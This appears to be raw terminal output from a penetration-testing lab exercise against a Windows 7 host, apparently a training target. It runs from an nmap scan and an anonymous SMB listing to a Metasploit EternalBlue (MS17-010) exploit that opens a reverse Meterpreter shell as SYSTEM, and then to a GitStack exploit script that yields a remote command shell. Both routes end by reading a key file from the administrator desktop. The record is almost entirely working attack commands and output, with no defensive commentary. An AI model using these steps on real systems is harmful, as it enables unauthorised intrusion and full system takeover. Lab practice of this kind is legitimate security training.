nmap -sC -sV -T4 -A -Pn -p- --open 10.11.1.113
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-12 01:44 EST
Stats: 0:00:46 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 61.54% done; ETC: 01:45 (0:00:20 remaining)
Stats: 0:01:27 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 0.00% done
Stats: 0:01:33 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 99.11% done; ETC: 01:45 (0:00:00 remaining)
Stats: 0:01:34 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 99.11% done; ETC: 01:45 (0:00:00 remaining)
Nmap scan report for 10.11.1.113
Host is up (0.021s latency).
Not shown: 62563 closed tcp ports (reset), 2959 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT      STATE SERVICE      VERSION
80/tcp    open  http         Apache httpd 2.2.22 ((Win32) mod_ssl/2.2.22 OpenSSL/0.9.8u mod_wsgi/3.3 Python/2.7.2 PHP/5.4.3)
|_http-title: Page not found at /
|_http-server-header: Apache/2.2.22 (Win32) mod_ssl/2.2.22 OpenSSL/0.9.8u mod_wsgi/3.3 Python/2.7.2 PHP/5.4.3
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
2869/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
3389/tcp  open  tcpwrapped
|_ssl-date: 2025-02-12T06:46:33+00:00; 0s from scanner time.
| rdp-ntlm-info: 
|   Target_Name: ANTHONY-PC
|   NetBIOS_Domain_Name: ANTHONY-PC
|   NetBIOS_Computer_Name: ANTHONY-PC
|   DNS_Domain_Name: Anthony-PC
|   DNS_Computer_Name: Anthony-PC
|   Product_Version: 6.1.7601
|_  System_Time: 2025-02-12T06:45:29+00:00
| ssl-cert: Subject: commonName=Anthony-PC
| Not valid before: 2025-02-11T06:44:00
|_Not valid after:  2025-08-13T06:44:00
5357/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Service Unavailable
10243/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49152/tcp open  msrpc        Microsoft Windows RPC
49153/tcp open  msrpc        Microsoft Windows RPC
49154/tcp open  msrpc        Microsoft Windows RPC
49155/tcp open  msrpc        Microsoft Windows RPC
49156/tcp open  msrpc        Microsoft Windows RPC
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.94SVN%E=4%D=2/12%OT=80%CT=1%CU=43426%PV=Y%DS=2%DC=I%G=Y%TM=67AC
OS:43D0%P=x86_64-pc-linux-gnu)SEQ(SP=102%GCD=1%ISR=107%TI=I%TS=7)OPS(O1=M5B
OS:4NW8ST11%O2=M5B4NW8ST11%O3=M5B4NW8NNT11%O4=M5B4NW8ST11%O5=M5B4NW8ST11%O6
OS:=M5B4ST11)WIN(W1=2000%W2=2000%W3=2000%W4=2000%W5=2000%W6=2000)ECN(R=Y%DF
OS:=Y%T=80%W=2000%O=M5B4NW8NNS%CC=N%Q=)T1(R=Y%DF=Y%T=80%S=O%A=S+%F=AS%RD=0%
OS:Q=)T2(R=N)T3(R=N)T4(R=N)T5(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6
OS:(R=N)T7(R=N)U1(R=Y%DF=N%T=80%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RU
OS:D=G)IE(R=N)
 
Network Distance: 2 hops
Service Info: Host: ANTHONY-PC; OS: Windows; CPE: cpe:/o:microsoft:windows
 
Host script results:
| smb-security-mode: 
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-time: 
|   date: 2025-02-12T06:45:28
|_  start_date: 2025-02-12T05:43:58
|_nbstat: NetBIOS name: ANTHONY-PC, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:ac:36:ed (VMware)
| smb-os-discovery: 
|   OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
|   OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
|   Computer name: Anthony-PC
|   NetBIOS computer name: ANTHONY-PC\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2025-02-11T22:45:29-08:00
|_clock-skew: mean: 1h36m00s, deviation: 3h34m40s, median: 0s
| smb2-security-mode: 
|   2:1:0: 
|_    Message signing enabled but not required
 
TRACEROUTE
HOP RTT      ADDRESS
1   21.46 ms 10.11.1.113
 
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 158.86 seconds
 

80/tcp    open  http         Apache httpd 2.2.22 ((Win32) mod_ssl/2.2.22 OpenSSL/0.9.8u mod_wsgi/3.3 Python/2.7.2 PHP/5.4.3)
|_http-title: Page not found at /
|_http-server-header: Apache/2.2.22 (Win32) mod_ssl/2.2.22 OpenSSL/0.9.8u mod_wsgi/3.3 Python/2.7.2 PHP/5.4.3

445/tcp   open  microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)

smbclient -N -L \\\\10.11.1.113
Anonymous login successful
 
	Sharename       Type      Comment
	---------       ----      -------
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.11.1.113 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available

msf6 exploit(windows/smb/ms17_010_eternalblue) > set rhosts 10.11.1.113
rhosts => 10.11.1.113
msf6 exploit(windows/smb/ms17_010_eternalblue) > set lhost 172.16.1.1
lhost => 172.16.1.1
msf6 exploit(windows/smb/ms17_010_eternalblue) > run

msf6 exploit(windows/smb/ms17_010_eternalblue) > run
 
[*] Started reverse TCP handler on 172.16.1.1:4444 
[*] 10.11.1.113:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 10.11.1.113:445       - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 10.11.1.113:445       - Scanned 1 of 1 hosts (100% complete)
[+] 10.11.1.113:445 - The target is vulnerable.
[*] 10.11.1.113:445 - Connecting to target for exploitation.
[+] 10.11.1.113:445 - Connection established for exploitation.
[+] 10.11.1.113:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.11.1.113:445 - CORE raw buffer dump (42 bytes)
[*] 10.11.1.113:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73  Windows 7 Profes
[*] 10.11.1.113:445 - 0x00000010  73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76  sional 7601 Serv
[*] 10.11.1.113:445 - 0x00000020  69 63 65 20 50 61 63 6b 20 31                    ice Pack 1      
[+] 10.11.1.113:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.11.1.113:445 - Trying exploit with 12 Groom Allocations.
[*] 10.11.1.113:445 - Sending all but last fragment of exploit packet
[*] Sending stage (203846 bytes) to 10.11.1.113
[*] Meterpreter session 1 opened (172.16.1.1:4444 -> 10.11.1.113:49425) at 2025-02-12 10:09:30 -0500
[-] 10.11.1.113:445 - RubySMB::Error::CommunicationError: RubySMB::Error::CommunicationError
 
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > shell
Process 3416 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.
 
C:\Windows\system32>whoami
whoami
nt authority\system
 
C:\Windows\system32>type C:\users\administrator\desktop\key.txt
type C:\users\administrator\desktop\key.txt
uq0c8n6id4aaj8ivr67e
C:\Windows\system32>date
date
The current date is: Wed 02/12/2025 

python3 exploit_refactored.py -U test -P test -r test 10.11.1.113 
[+] Connected to http://10.11.1.113:80/ successfully.
[*] Creating users on http://10.11.1.113:80/.
[*] Found user test
[*] Web repository already created
[*] Getting repository list
[*] Found repo: test
[*] Adding user test to repository
[*] Disabling everyone user access to repository
b'Your GitStack credentials were not entered correcly. Please ask your GitStack administrator to give you a username/password and give you access to this repository. <br />Note : You have to enter the credentials of a user which has at least read access to your repository. Your GitStack administration panel username/password will not work. '
 
[+] The target is vulnerable and a pseudoshell has been obtained.
Type commands to have them executed on the target.
[*] Type 'exit' to exit.
 
> whoami
"nt authority\system
" 
 
> type C:\users\administrator\desktop\key.txt
"uq0c8n6id4aaj8ivr67e" 
 
> date
"The current date is: Wed 02/12/2025 
Enter the new date: (mm-dd-yy) "